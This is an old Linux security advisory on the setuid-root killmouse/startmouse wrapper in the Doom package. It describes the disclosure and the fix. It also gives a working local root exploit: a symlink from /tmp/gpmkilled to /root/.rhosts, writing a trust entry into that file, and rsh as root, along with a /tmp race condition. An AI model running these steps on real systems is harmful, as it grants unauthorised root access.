

    Slackware 3.0, other distributions might be too.


    The  problem  is   the  killmouse/startmouse command that is  part
    of  Doom  package   on   Linux   systems.   It   is   actually   a
    C-wrapper that runs two scripts  (  It
    runs suid  root.   Thnx to  Bo (  who originally
    posted this.

         if [ -r /tmp/gpmkilled ]; then
           /usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
           /bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled

         if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
           GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled

    This  can   be  exploited   in  a  few similar ways.  Here's  just
    one.  Let's  assume  the   gpm  utility  is not running.  We can't
    start it up ourselves as gpm is  only to be run by root. So  we'll
    use startmouse to fire it up:

         $ touch /tmp/gpmkilled
         $ /usr/games/doom/startmouse

         ps -aux | grep gpm
         bo        1436  0.0  2.0   40  312 v03 R    16:33   0:00 grep gpm
         root      1407  0.0  2.4   42  368  ?  S    16:24   0:00 /usr/bin/gpm t ms

    Fine,   it's   running.   Now   we'll  use  killmouse  to kill the
    process, but first we set  our umask to 0 and  link /tmp/gpmkilled
    to /root/.rhosts:

         $ umask 0
         $ ln -s /root/.rhosts /tmp/gpmkilled
         $ /usr/games/doom/killmouse
          1407  ?  S     0:00 gpm t ms

         $ ls -l /root/.rhosts
         -rw-rw-rw-   1 root     users           0 Dec 13 16:44 /root/.rhosts

         $ echo localhost bo > /root/.rhosts
         $ rsh -l root localhost sh -i

    On  some  systems  gpm might not be started  in /etc/rc.d/rc.local
    so  the   startmouse  script will  fail. But gpm might  be running
    already.   If   neither  of  these  conditions  are met, note that  creates  /tmp/gpmscript   and  runs  it in a shell.
    There's  a  window  of  time  between  creating   the   script and
    executing it, so  we have a  nice race condition  here; it can  be
    replaced with anything you like prior to execution.


    Remove   setuid   bits   of   killmouse/startmouse.   Better yet -
    nuke them.  While your at it,  nuke Doom too - it's a stupid  game
    anyway :-)